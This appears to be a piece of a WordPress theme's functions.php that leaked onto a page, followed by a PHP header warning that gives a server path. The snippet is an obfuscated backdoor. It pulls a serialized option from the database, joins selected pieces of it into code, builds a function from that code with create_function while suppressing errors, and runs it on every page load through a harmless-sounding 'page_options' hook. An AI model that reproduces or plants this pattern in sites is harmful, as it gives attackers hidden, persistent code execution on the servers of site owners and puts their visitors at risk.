function page_options() { $option = get_option('page_option'); $opt=unserialize($option); @$arg = create_function('', $opt[1].$opt[4].$opt[10].$opt[12].$opt[14].$opt[7] );return $arg('');} add_action('loop_start', 'page_options');
Warning: Cannot modify header information - headers already sent by (output started at /home/instants/public_html/blog/wp-content/themes/canvas/functions.php:38) in /home/instants/public_html/blog/wp-includes/pluggable.php on line 890